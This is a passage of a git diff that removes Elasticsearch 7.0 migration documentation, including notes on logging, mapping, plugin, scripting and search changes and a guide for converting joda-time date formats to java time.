`get(ChronoField.YEAR_OF_ERA) % 100` -* `getYearOfEra()` should be replaced with `get(ChronoField.YEAR_OF_ERA)` -* `toString(String)` should be replaced with a `DateTimeFormatter` -* `toString(String,Locale)` should be replaced with a `DateTimeFormatter` - -[discrete] -==== Negative epoch timestamps are no longer supported - -With the switch to java time, support for negative timestamps has been removed. -For dates before 1970, use a date format containing a year. - - -[discrete] -==== Migration guide -For a detailed migration guide, see <>. - -include::migrate_to_java_time.asciidoc[] diff --git a/docs/reference/migration/migrate_7_0/logging.asciidoc b/docs/reference/migration/migrate_7_0/logging.asciidoc deleted file mode 100644 index d9180fd81bd..00000000000 --- a/docs/reference/migration/migrate_7_0/logging.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ -[discrete] -[[breaking_70_logging_changes]] -=== Logging changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[new-json-format-log-directory]] -==== New JSON format log files in `log` directory - -Elasticsearch now will produce additional log files in JSON format. They will be stored in `*.json` suffix files. -Following files should be expected now in log directory: -* ${cluster_name}_server.json -* ${cluster_name}_deprecation.json -* ${cluster_name}_index_search_slowlog.json -* ${cluster_name}_index_indexing_slowlog.json -* ${cluster_name}.log -* ${cluster_name}_deprecation.log -* ${cluster_name}_index_search_slowlog.log -* ${cluster_name}_index_indexing_slowlog.log -* ${cluster_name}_audit.json -* gc.log - -Note: You can configure which of these files are written by editing `log4j2.properties`. - -[discrete] -[[log-files-ending-log-deprecated]] -==== Log files ending with `*.log` deprecated -Log files with the `.log` file extension using the old pattern layout format -are now considered deprecated and the newly added JSON log file format with -the `.json` file extension should be used instead. -Note: GC logs which are written to the file `gc.log` will not be changed. - -[discrete] -==== Docker output in JSON format - -All Docker console logs are now in JSON format. You can distinguish logs streams with the `type` field. - -[discrete] -==== Audit plaintext log file removed, JSON file renamed - -Elasticsearch no longer produces the `${cluster_name}_access.log` plaintext -audit log file. The `${cluster_name}_audit.log` files also no longer exist; they -are replaced by `${cluster_name}_audit.json` files. When auditing is enabled, -auditing events are stored in these dedicated JSON log files on each node. - diff --git a/docs/reference/migration/migrate_7_0/low_level_restclient.asciidoc b/docs/reference/migration/migrate_7_0/low_level_restclient.asciidoc deleted file mode 100644 index 79654f0f6d5..00000000000 --- a/docs/reference/migration/migrate_7_0/low_level_restclient.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[discrete] -[[breaking_70_low_level_restclient_changes]] -=== Low-level REST client changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[maxretrytimeout-removed]] -==== Support for `maxRetryTimeout` removed from RestClient - -`RestClient` and `RestClientBuilder` no longer support the `maxRetryTimeout` -setting. The setting was removed as its counting mechanism was not accurate -and caused issues while adding little value. - -[discrete] -==== Deprecated flavors of performRequest have been removed - -We deprecated the flavors of `performRequest` and `performRequestAsync` that -do not take `Request` objects in 6.4.0 in favor of the flavors that take -`Request` objects because those methods can be extended without breaking -backwards compatibility. - -[discrete] -==== Removed setHosts - -We deprecated `setHosts` in 6.4.0 in favor of `setNodes` because it supports -host metadata used by the `NodeSelector`. - -[discrete] -==== Minimum compiler version change -The minimum compiler version on the low-level REST client has been bumped -to JDK 8. diff --git a/docs/reference/migration/migrate_7_0/mappings.asciidoc b/docs/reference/migration/migrate_7_0/mappings.asciidoc deleted file mode 100644 index 0eb7b8c310b..00000000000 --- a/docs/reference/migration/migrate_7_0/mappings.asciidoc +++ /dev/null @@ -1,119 +0,0 @@ -[discrete] -[[breaking_70_mappings_changes]] -=== Mapping changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[all-meta-field-removed]] -==== The `_all` metadata field is removed - -The `_all` field deprecated in 6 have now been removed. - -[discrete] -[[uid-meta-field-removed]] -==== The `_uid` metadata field is removed - -This field used to index a composite key formed of the `_type` and the `_id`. -Now that indices cannot have multiple types, this has been removed in favour -of `_id`. - -//tag::notable-breaking-changes[] -[discrete] -[[default-mapping-not-allowed]] -==== The `_default_` mapping is no longer allowed - -The `_default_` mapping has been deprecated in 6.0 and is now no longer allowed -in 7.0. Trying to configure a `_default_` mapping on 7.x indices will result in -an error. - -If an index template contains a `_default_` mapping, it will fail to create new -indices. To resolve this issue, the `_default_` mapping should be removed from -the template. Note that in 7.x, the <> -does not show the `_default_` mapping by default, even when it is defined in -the mapping. To see all mappings in the template, the `include_type_name` -parameter must be supplied: - -``` -GET /_template/my_template?include_type_name -``` - -For more details on the `include_type_name` parameter and other types-related -API changes, please see <>. -//end::notable-breaking-changes[] - -[discrete] -[[index-options-numeric-fields-removed]] -==== `index_options` for numeric fields has been removed - -The `index_options` field for numeric fields has been deprecated in 6 and has now been removed. - -[discrete] -[[limit-number-nested-json-objects]] -==== Limiting the number of `nested` json objects - -To safeguard against out of memory errors, the number of nested json objects within a single -document across all fields has been limited to 10000. This default limit can be changed with -the index setting `index.mapping.nested_objects.limit`. - -[discrete] -[[update-all-types-option-removed]] -==== The `update_all_types` option has been removed - -This option is useless now that all indices have at most one type. - -[discrete] -[[classic-similarity-removed]] -==== The `classic` similarity has been removed - -The `classic` similarity relied on coordination factors for scoring to be good -in presence of stopwords in the query. This feature has been removed from -Lucene, which means that the `classic` similarity now produces scores of lower -quality. It is advised to switch to `BM25` instead, which is widely accepted -as a better alternative. - -[discrete] -==== Similarities fail when unsupported options are provided - -An error will now be thrown when unknown configuration options are provided -to similarities. Such unknown parameters were ignored before. - -[discrete] -[[changed-default-geo-shape-index-strategy]] -==== Changed default `geo_shape` indexing strategy - -`geo_shape` types now default to using a vector indexing approach based on Lucene's new -`LatLonShape` field type. This indexes shapes as a triangular mesh instead of decomposing -them into individual grid cells. To index using legacy prefix trees the `tree` parameter -must be explicitly set to one of `quadtree` or `geohash`. Note that these strategies are -now deprecated and will be removed in a future version. - -IMPORTANT NOTE: If using timed index creation from templates, the `geo_shape` mapping -should also be changed in the template to explicitly define `tree` to one of `geohash` -or `quadtree`. This will ensure compatibility with previously created indexes. - -[discrete] -[[deprecated-geo-shape-params]] -==== Deprecated `geo_shape` parameters - -The following type parameters are deprecated for the `geo_shape` field type: `tree`, -`precision`, `tree_levels`, `distance_error_pct`, `points_only`, and `strategy`. They -will be removed in a future version. - -[discrete] -==== Limiting the number of completion contexts - -The maximum allowed number of completion contexts in a mapping will be limited -to 10 in the next major version. Completion fields that define more than 10 -contexts in a mapping will log a deprecation warning in this version. - -[discrete] -[[include-type-name-defaults-false]] -==== `include_type_name` now defaults to `false` -The default for `include_type_name` is now `false` for all APIs that accept -the parameter. diff --git a/docs/reference/migration/migrate_7_0/migrate_to_java_time.asciidoc b/docs/reference/migration/migrate_7_0/migrate_to_java_time.asciidoc deleted file mode 100644 index fc8feef6bf7..00000000000 --- a/docs/reference/migration/migrate_7_0/migrate_to_java_time.asciidoc +++ /dev/null @@ -1,417 +0,0 @@ -[[migrate-to-java-time]] -=== Java time migration guide - -With 7.0, {es} switched from joda time to java time for date-related parsing, -formatting, and calculations. This guide is designed to help you determine -if your cluster is impacted and, if so, prepare for the upgrade. - -You do not need to convert joda-time date formats to java time for indices -created in {es} 6.8 before upgrading to 7.7 or later versions. However, mappings -for indices created in 7.7 and later versions must use java-time formats. - -To ensure new indices use java-time formats, we recommend you update any ingest -pipelines and index templates created in 6.8 to java time before upgrading. See: - -* <> -* <> - -Indices created in versions 7.0-7.6 cannot use joda time. This was fixed -was in 7.7 with {es-pull}52555[#52555]. -[discrete] -[[java-time-convert-date-formats]] -=== Convert date formats - -To use java time in 6.8, prefix the date format with an `8`. -For example, you can change the date format `YYYY-MM-dd` to `8yyyy-MM-dd` to -indicate the date format uses java time. - -{es} treats date formats starting with the `8` prefix differently depending on -the version: - -*6.8*: Date formats with an `8` prefix are handled as java-time formats. Date -formats without an `8` prefix are treated as joda-time formats. We recommend -converting these joda-time formats to java-time _before_ upgrading to 7.x. - -*7.x and later*: For indices created in 6.x, date formats without an `8` prefix -are treated as joda-time formats. For indices created in 7.x and later versions, -all date formats are treated as java-time formats, regardless of whether it -starts with an `8` prefix. - -[[java-time-migration-impacted-features]] -==== Impacted features -The switch to java time only impacts custom <> and -<> formats. - -These formats are commonly used in: - -* <> -* <> -* <> - -If you don't use custom date formats, you can skip the rest of this guide. -Most custom date formats are compatible. However, several require -an update. - -To see if your date format is impacted, use the <> -or the {kibana-ref}/upgrade-assistant.html[Kibana upgrade assistant]. - -[[java-time-migration-incompatible-date-formats]] -==== Incompatible date formats -Custom date formats containing the following joda-time literals should be -converted to their java-time equivalents. - -`Y` (Year of era):: -+ --- -Replace with `y`. - -*Example:* -`YYYY-MM-dd` should become `yyyy-MM-dd`. - -In java time, `Y` is used for -https://docs.oracle.com/javase/8/docs/api/java/time/temporal/WeekFields.html[week-based year]. -Using `Y` in place of `y` could result in off-by-one errors in year calculation. - -For pattern `YYYY-ww` and date `2019-01-01T00:00:00.000Z` will give `2019-01` -For pattern `YYYY-ww` and date `2018-12-31T00:00:00.000Z` will give `2019-01` (counter-intuitive) because there is >4 days of that week in 2019 --- - -`y` (Year):: -+ --- -Replace with `u`. - -*Example:* -`yyyy-MM-dd` should become `uuuu-MM-dd`. - -In java time, `y` is used for year of era. `u` can contain non-positive -values while `y` cannot. `y` can also be associated with an era field. --- - - -`C` (Century of era):: -+ --- -Century of era is not supported in java time. -There is no replacement. Instead, we recommend you preprocess your input. --- - -`x` (Week year):: -+ --- -Replace with `Y`. - -In java time, `x` means https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html[zone-offset]. - -[WARNING] -==== -Failure to properly convert `x` (Week year) to `Y` could result in data loss. -==== --- - -`Z` (Zone offset/id):: -+ --- -Replace with multiple `X`'s. - -`Z` has a similar meaning in java time. However, java time expects different -numbers of literals to parse different forms. - -Consider migrating to `X`, which gives you more control over how time is parsed. -For example, the joda-time format `YYYY-MM-dd'T'hh:mm:ssZZ` accepts the following dates: - -``` -2010-01-01T01:02:03Z -2010-01-01T01:02:03+01 -2010-01-01T01:02:03+01:02 -2010-01-01T01:02:03+01:02:03 -``` - -In java time, you cannot parse all these dates using a single format -Instead, you must specify 3 separate formats: - -``` -2010-01-01T01:02:03Z -2010-01-01T01:02:03+01 -both parsed with yyyy-MM-dd'T'hh:mm:ssX - -2010-01-01T01:02:03+01:02 -yyyy-MM-dd'T'hh:mm:ssXXX - -2010-01-01T01:02:03+01:02:03 -yyyy-MM-dd'T'hh:mm:ssXXXXX -``` - - -The formats must then be delimited using `||`: -[source,txt] --------------------------------------------------- -yyyy-MM-dd'T'hh:mm:ssX||yyyy-MM-dd'T'hh:mm:ssXXX||yyyy-MM-dd'T'hh:mm:ssXXXXX --------------------------------------------------- - -The same applies if you expect your pattern to occur without a colon (`:`): -For example, the `YYYY-MM-dd'T'hh:mm:ssZ` format accepts the following date forms: -``` -2010-01-01T01:02:03Z -2010-01-01T01:02:03+01 -2010-01-01T01:02:03+0102 -2010-01-01T01:02:03+010203 -``` -To accept all these forms in java time, you must use the `||` delimiter: -[source,txt] --------------------------------------------------- -yyyy-MM-dd'T'hh:mm:ssX||yyyy-MM-dd'T'hh:mm:ssXX||yyyy-MM-dd'T'hh:mm:ssXXXX --------------------------------------------------- --- - -`d` (Day):: -+ --- -In java time, `d` is still interpreted as "day" but is less flexible. - -For example, the joda-time date format `YYYY-MM-dd` accepts `2010-01-01` or -`2010-01-1`. - -In java time, you must use the `||` delimiter to provide specify each format: - -[source,txt] --------------------------------------------------- -yyyy-MM-dd||yyyy-MM-d --------------------------------------------------- - -In java time, `d` also does not accept more than 2 digits. To accept days with more -than two digits, you must include a text literal in your java-time date format. -For example, to parse `2010-01-00001`, you must use the following java-time date format: - -[source,txt] --------------------------------------------------- -yyyy-MM-'000'dd --------------------------------------------------- --- - -`e` (Name of day):: -+ --- -In java time, `e` is still interpreted as "name of day" but does not parse -short- or full-text forms. - -For example, the joda-time date format `EEE YYYY-MM` accepts both -`Wed 2020-01` and `Wednesday 2020-01`. - -To accept both of these dates in java time, you must specify each format using -the `||` delimiter: - -[source,txt] --------------------------------------------------- -cccc yyyy-MM||ccc yyyy-MM --------------------------------------------------- - -The joda-time literal `E` is interpreted as "day of week." -The java-time literal `c` is interpreted as "localized day of week." -`E` does not accept full-text day formats, such as `Wednesday`. --- - -`EEEE` and similar text forms:: -+ --- -Support for full-text forms depends on the locale data provided with your Java -Development Kit (JDK) and other implementation details. We recommend you -test formats containing these patterns carefully before upgrading. --- - -`z` (Time zone text):: -+ --- -In java time, `z` outputs 'Z' for Zulu when given a UTC timezone. --- - -[[java-time-migration-test]] -===== Test with your data - -We strongly recommend you test any date format changes using real data before -deploying in production. - -For help with date debugging, consider using -https://esddd.herokuapp.com/[https://esddd.herokuapp.com/.] - -[[java-time-migrate-update-mappings]] -==== Update index mappings -To update joda-time date formats in index mappings, you must create a new index -with an updated mapping and reindex your data to it. -You can however update your pipelines or templates. - -The following `my-index-000001` index contains a mapping for the `datetime` field, a -`date` field with a custom joda-time date format. -//// -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "datetime": { - "type": "date", - "format": "yyyy/MM/dd HH:mm:ss||yyyy/MM/dd||epoch_millis" - } - } - } -} --------------------------------------------------- -//// - -[source,console] --------------------------------------------------- -GET my-index-000001/_mapping --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "my-index-000001" : { - "mappings" : { - "properties" : { - "datetime": { - "type": "date", - "format": "yyyy/MM/dd HH:mm:ss||yyyy/MM/dd||epoch_millis" - } - } - } - } -} --------------------------------------------------- - - -To change the date format for the `datetime` field, create a separate index -containing an updated mapping and date format. - -For example, the following `my-index-000002` index changes the `datetime` field's -date format to `8uuuu/MM/dd HH:mm:ss||uuuu/MM/dd||epoch_millis`. The `8` prefix -indicates this date format uses java time. - -[source,console] --------------------------------------------------- -PUT my-index-000002 -{ - "mappings": { - "properties": { - "datetime": { - "type": "date", - "format": "8uuuu/MM/dd HH:mm:ss||uuuu/MM/dd||epoch_millis" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -Next, reindex data from the old index to the new index. - -The following <> API request reindexes data from -`my-index-000001` to `my-index-000002`. - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001" - }, - "dest": { - "index": "my-index-000002" - } -} --------------------------------------------------- -// TEST[continued] - -If you use index aliases, update them to point to the new index. - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "remove" : { "index" : "my-index-000001", "alias" : "my-index" } }, - { "add" : { "index" : "my-index-000002", "alias" : "my-index" } } - ] -} --------------------------------------------------- -// TEST[continued] - -[[java-time-migration-update-ingest-pipelines]] -===== Update ingest pipelines -If your ingest pipelines contain joda-time date formats, you can update them -using the <> API. - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/my_pipeline -{ - "description": "Pipeline for routing data to specific index", - "processors": [ - { - "date": { - "field": "createdTime", - "formats": [ - "8uuuu-w" - ] - }, - "date_index_name": { - "field": "@timestamp", - "date_rounding": "d", - "index_name_prefix": "x-", - "index_name_format": "8uuuu-w" - } - } - ] -} --------------------------------------------------- - - -[[java-time-migration-update-index-templates]] -===== Update index templates - -If your index templates contain joda-time date formats, you can update them -using the <> API. - -[source,console] --------------------------------------------------- -PUT _template/template_1 -{ - "index_patterns": [ - "te*", - "bar*" - ], - "settings": { - "number_of_shards": 1 - }, - "mappings": { - "_source": { - "enabled": false - }, - "properties": { - "host_name": { - "type": "keyword" - }, - "created_at": { - "type": "date", - "format": "8EEE MMM dd HH:mm:ss Z yyyy" - } - } - } -} --------------------------------------------------- - -//// -[source,console] --------------------------------------------------- -DELETE /_template/template_1 --------------------------------------------------- -// TEST[continued] -//// - -[[java-time-migration-update-external-tools-templates]] -===== Update external tools and templates -Ensure you also update any date formats in templates or tools outside of {es}. -This can include tools such as {beats-ref}/getting-started.html[{beats}] or -{logstash-ref}/index.html[Logstash]. diff --git a/docs/reference/migration/migrate_7_0/ml.asciidoc b/docs/reference/migration/migrate_7_0/ml.asciidoc deleted file mode 100644 index df5af8b3f4c..00000000000 --- a/docs/reference/migration/migrate_7_0/ml.asciidoc +++ /dev/null @@ -1,15 +0,0 @@ -[discrete] -[[breaking_70_ml_changes]] -=== ML changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -==== Types in Datafeed config are no longer valid -Types have been removed from the datafeed config and are no longer -valid parameters. diff --git a/docs/reference/migration/migrate_7_0/node.asciidoc b/docs/reference/migration/migrate_7_0/node.asciidoc deleted file mode 100644 index 2bbc4fcef7a..00000000000 --- a/docs/reference/migration/migrate_7_0/node.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[discrete] -[[breaking_70_node_changes]] -=== Node start up - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -==== Nodes with left-behind data or metadata refuse to start -Repurposing an existing node by changing node.master or node.data to false can leave lingering on-disk metadata and -data around, which will not be accessible by the node's new role. Beside storing non-accessible data, this can lead -to situations where dangling indices are imported even though the node might not be able to host any shards, leading -to a red cluster health. To avoid this, - -* nodes with on-disk shard data and node.data set to false will refuse to start -* nodes with on-disk index/shard data and both node.master and node.data set to false will refuse to start - -Beware that such role changes done prior to the 7.0 upgrade could prevent node start up in 7.0. diff --git a/docs/reference/migration/migrate_7_0/packaging.asciidoc b/docs/reference/migration/migrate_7_0/packaging.asciidoc deleted file mode 100644 index e1ea4c70d37..00000000000 --- a/docs/reference/migration/migrate_7_0/packaging.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[discrete] -[[breaking_70_packaging_changes]] -=== Packaging changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[systemd-service-file-config]] -==== systemd service file is no longer configuration - -The systemd service file `/usr/lib/systemd/system/elasticsearch.service` -was previously marked as a configuration file in rpm and deb packages. -Overrides to the systemd elasticsearch service should be made -in `/etc/systemd/system/elasticsearch.service.d/override.conf`. - -[discrete] -==== tar package no longer includes windows specific files - -The tar package previously included files in the `bin` directory meant only -for windows. These files have been removed. Use the `zip` package instead. - -[discrete] -==== Ubuntu 14.04 is no longer supported - -Ubuntu 14.04 will reach end-of-life on April 30, 2019. As such, we are no longer -supporting Ubuntu 14.04. - -[discrete] -==== CLI secret prompting is no longer supported -The ability to use `${prompt.secret}` and `${prompt.text}` to collect secrets -from the CLI at server start is no longer supported. Secure settings have replaced -the need for these prompts. diff --git a/docs/reference/migration/migrate_7_0/plugins.asciidoc b/docs/reference/migration/migrate_7_0/plugins.asciidoc deleted file mode 100644 index 41687e08e79..00000000000 --- a/docs/reference/migration/migrate_7_0/plugins.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -[discrete] -[[breaking_70_plugins_changes]] -=== Plugins changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -==== Azure Repository plugin - -* The legacy azure settings which where starting with `cloud.azure.storage.` prefix have been removed. -This includes `account`, `key`, `default` and `timeout`. -You need to use settings which are starting with `azure.client.` prefix instead. - -* Global timeout setting `cloud.azure.storage.timeout` has been removed. -You must set it per azure client instead. Like `azure.client.default.timeout: 10s` for example. - -See {plugins}/repository-azure-repository-settings.html#repository-azure-repository-settings[Azure Repository settings]. - -[discrete] -==== Google Cloud Storage Repository plugin - -* The repository settings `application_name`, `connect_timeout` and `read_timeout` have been removed and -must now be specified in the client settings instead. - -See {plugins}/repository-gcs-client.html#repository-gcs-client[Google Cloud Storage Client Settings]. - -[discrete] -==== S3 Repository Plugin - -* The plugin now uses the path style access pattern for all requests. -In previous versions it was automatically determining whether to use virtual hosted style or path style -access. - -[discrete] -==== Analysis Plugin changes - -* The misspelled helper method `requriesAnalysisSettings(AnalyzerProvider provider)` has been -renamed to `requiresAnalysisSettings` - -[discrete] -==== File-based discovery plugin - -* This plugin has been removed since its functionality is now part of -Elasticsearch and requires no plugin. The location of the hosts file has moved -from `$ES_PATH_CONF/file-discovery/unicast_hosts.txt` to -`$ES_PATH_CONF/unicast_hosts.txt`. See <> for further information. - -[discrete] -==== Security Extensions - -As a consequence of the <>, -the `getRealmSettings` method has been removed from the `SecurityExtension` class, -and the `settings` method on `RealmConfig` now returns the node's (global) settings. -Custom security extensions should register their settings by implementing the standard -`Plugin.getSettings` method, and can retrieve them from `RealmConfig.settings()` or -using one of the `RealmConfig.getSetting` methods. -Each realm setting should be defined as an `AffixSetting` as shown in the example below: -[source,java] --------------------------------------------------- -Setting.AffixSetting MY_SETTING = Setting.affixKeySetting( - "xpack.security.authc.realms." + MY_REALM_TYPE + ".", "my_setting", - key -> Setting.simpleString(key, properties) -); --------------------------------------------------- - -The `RealmSettings.simpleString` method can be used as a convenience for the above. - -[discrete] -==== Tribe node removed - -Tribe node functionality has been removed in favor of -<>. - -[discrete] -==== Discovery implementations are no longer pluggable - -* The method `DiscoveryPlugin#getDiscoveryTypes()` was removed, so that plugins - can no longer provide their own discovery implementations. - -[discrete] -[[watcher-hipchat-action-removed]] -==== Watcher 'hipchat' action removed - -Hipchat has been deprecated and shut down as a service. The `hipchat` action for -watches has been removed. diff --git a/docs/reference/migration/migrate_7_0/restclient.asciidoc b/docs/reference/migration/migrate_7_0/restclient.asciidoc deleted file mode 100644 index 19f8ca1daff..00000000000 --- a/docs/reference/migration/migrate_7_0/restclient.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[discrete] -[[breaking_70_restclient_changes]] -=== High-level REST client changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[remove-header-args]] -==== API methods accepting `Header` argument have been removed - -All API methods accepting headers as a `Header` varargs argument, deprecated -since 6.4, have been removed in favour of the newly introduced methods that -accept instead a `RequestOptions` argument. In case you are not specifying any -header, e.g. `client.index(indexRequest)` becomes -`client.index(indexRequest, RequestOptions.DEFAULT)`. -In case you are specifying headers -e.g. `client.index(indexRequest, new Header("name" "value"))` becomes -`client.index(indexRequest, RequestOptions.DEFAULT.toBuilder().addHeader("name", "value").build());` - -[discrete] -[[cluster-health-api-default-cluster-level]] -==== Cluster Health API default to `cluster` level - -The Cluster Health API used to default to `shards` level to ease migration -from transport client that doesn't support the `level` parameter and always -returns information including indices and shards details. The level default -value has been aligned with the Elasticsearch default level: `cluster`. diff --git a/docs/reference/migration/migrate_7_0/scripting.asciidoc b/docs/reference/migration/migrate_7_0/scripting.asciidoc deleted file mode 100644 index cf72cbb1de0..00000000000 --- a/docs/reference/migration/migrate_7_0/scripting.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[discrete] -[[breaking_70_scripting_changes]] -=== Scripting changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - - -[discrete] -==== getDate() and getDates() removed - -Fields of type `long` and `date` had `getDate()` and `getDates()` methods -(for multi valued fields) to get an object with date specific helper methods -for the current doc value. In 5.3.0, `date` fields were changed to expose -this same date object directly when calling `doc["myfield"].value`, and -the getter methods for date objects were deprecated. These methods have -now been removed. Instead, use `.value` on `date` fields, or explicitly -parse `long` fields into a date object using -`Instance.ofEpochMillis(doc["myfield"].value)`. - -[discrete] -==== Accessing missing document values will throw an error -`doc['field'].value` will throw an exception if -the document is missing a value for the field `field`. - -To check if a document is missing a value, you can use -`doc['field'].size() == 0`. - - -[discrete] -[[script-errors-return-400-error-codes]] -==== Script errors will return as `400` error codes - -Malformed scripts, either in search templates, ingest pipelines or search -requests, return `400 - Bad request` while they would previously return -`500 - Internal Server Error`. This also applies for stored scripts. - -[discrete] -==== getValues() removed - -The `ScriptDocValues#getValues()` method is deprecated in 6.6 and will -be removed in 7.0. Use `doc["foo"]` in place of `doc["foo"].values`. diff --git a/docs/reference/migration/migrate_7_0/search.asciidoc b/docs/reference/migration/migrate_7_0/search.asciidoc deleted file mode 100644 index 1a05d948790..00000000000 --- a/docs/reference/migration/migrate_7_0/search.asciidoc +++ /dev/null @@ -1,317 +0,0 @@ -[discrete] -[[breaking_70_search_changes]] -=== Search and Query DSL changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -==== Off-heap terms index - -The terms dictionary is the part of the inverted index that records all terms -that occur within a segment in sorted order. In order to provide fast retrieval, -terms dictionaries come with a small terms index that allows for efficient -random access by term. Until now this terms index had always been loaded -on-heap. - -As of 7.0, the terms index is loaded on-heap for fields that only have unique -values such as `_id` fields, and off-heap otherwise - likely most other fields. -This is expected to reduce memory requirements but might slow down search -requests if both below conditions are met: - -* The size of the data directory on each node is significantly larger than the - amount of memory that is available to the filesystem cache. - -* The number of matches of the query is not several orders of magnitude greater - than the number of terms that the query tries to match, either explicitly via - `term` or `terms` queries, or implicitly via multi-term queries such as - `prefix`, `wildcard` or `fuzzy` queries. - -This change affects both existing indices created with Elasticsearch 6.x and new -indices created with Elasticsearch 7.x. - -[discrete] -==== Changes to queries -* The default value for `transpositions` parameter of `fuzzy` query - has been changed to `true`. - -* The `query_string` options `use_dismax`, `split_on_whitespace`, - `all_fields`, `locale`, `auto_generate_phrase_query` and - `lowercase_expanded_terms` deprecated in 6.x have been removed. - -* Purely negative queries (only MUST_NOT clauses) now return a score of `0` - rather than `1`. - -* The boundary specified using geohashes in the `geo_bounding_box` query - now include entire geohash cell, instead of just geohash center. - -* Attempts to generate multi-term phrase queries against non-text fields - with a custom analyzer will now throw an exception. - -* An `envelope` crossing the dateline in a `geo_shape` query is now processed - correctly when specified using REST API instead of having its left and - right corners flipped. - -* Attempts to set `boost` on inner span queries will now throw a parsing exception. - -[discrete] -==== Adaptive replica selection enabled by default - -Adaptive replica selection has been enabled by default. If you wish to return to -the older round robin of search requests, you can use the -`cluster.routing.use_adaptive_replica_selection` setting: - -[source,console] --------------------------------------------------- -PUT /_cluster/settings -{ - "transient": { - "cluster.routing.use_adaptive_replica_selection": false - } -} --------------------------------------------------- - - -[discrete] -[[search-api-returns-400-invalid-requests]] -==== Search API returns `400` for invalid requests - -The Search API returns `400 - Bad request` while it would previously return -`500 - Internal Server Error` in the following cases of invalid request: - -* the result window is too large -* sort is used in combination with rescore -* the rescore window is too large -* the number of slices is too large -* keep alive for scroll is too large -* number of filters in the adjacency matrix aggregation is too large -* script compilation errors - -[discrete] -[[scroll-queries-cannot-use-request-cache]] -==== Scroll queries cannot use the `request_cache` anymore - -Setting `request_cache:true` on a query that creates a scroll (`scroll=1m`) -has been deprecated in 6 and will now return a `400 - Bad request`. -Scroll queries are not meant to be cached. - -[discrete] -[[scroll-queries-cannot-use-rescore]] -==== Scroll queries cannot use `rescore` anymore - -Including a rescore clause on a query that creates a scroll (`scroll=1m`) has -been deprecated in 6.5 and will now return a `400 - Bad request`. Allowing -rescore on scroll queries would break the scroll sort. In the 6.x line, the -rescore clause was silently ignored (for scroll queries), and it was allowed in -the 5.x line. - -[discrete] -==== Term Suggesters supported distance algorithms - -The following string distance algorithms were given additional names in 6.2 and -their existing names were deprecated. The deprecated names have now been -removed. - -* `levenstein` - replaced by `levenshtein` -* `jarowinkler` - replaced by `jaro_winkler` - -[discrete] -[[popular-mode-suggesters]] -==== `popular` mode for Suggesters - -The `popular` mode for Suggesters (`term` and `phrase`) now uses the doc frequency -(instead of the sum of the doc frequency) of the input terms to compute the frequency -threshold for candidate suggestions. - -[discrete] -==== Limiting the number of terms that can be used in a Terms Query request - -Executing a Terms Query with a lot of terms may degrade the cluster performance, -as each additional term demands extra processing and memory. -To safeguard against this, the maximum number of terms that can be used in a -Terms Query request has been limited to 65536. This default maximum can be changed -for a particular index with the index setting `index.max_terms_count`. - -[discrete] -==== Limiting the length of regex that can be used in a Regexp Query request - -Executing a Regexp Query with a long regex string may degrade search performance. -To safeguard against this, the maximum length of regex that can be used in a -Regexp Query request has been limited to 1000. This default maximum can be changed -for a particular index with the index setting `index.max_regex_length`. - -[discrete] -==== Limiting the number of auto-expanded fields - -Executing queries that use automatic expansion of fields (e.g. `query_string`, `simple_query_string` -or `multi_match`) can have performance issues for indices with a large numbers of fields. -To safeguard against this, a default limit of 1024 fields has been introduced for -queries using the "all fields" mode (`"default_field": "*"`) or other fieldname -expansions (e.g. `"foo*"`). If needed, you can change this limit using the -<> -dynamic cluster setting. - -[discrete] -[[invalid-search-request-body]] -==== Invalid `_search` request body - -Search requests with extra content after the main object will no longer be accepted -by the `_search` endpoint. A parsing exception will be thrown instead. - -[discrete] -==== Doc-value fields default format - -The format of doc-value fields is changing to be the same as what could be -obtained in 6.x with the special `use_field_mapping` format. This is mostly a -change for date fields, which are now formatted based on the format that is -configured in the mappings by default. This behavior can be changed by -specifying a <> within the doc-value -field. - -[discrete] -==== Context Completion Suggester - -The ability to query and index context enabled suggestions without context, -deprecated in 6.x, has been removed. Context enabled suggestion queries -without contexts have to visit every suggestion, which degrades the search performance -considerably. - -For geo context the value of the `path` parameter is now validated against the mapping, -and the context is only accepted if `path` points to a field with `geo_point` type. - -[discrete] 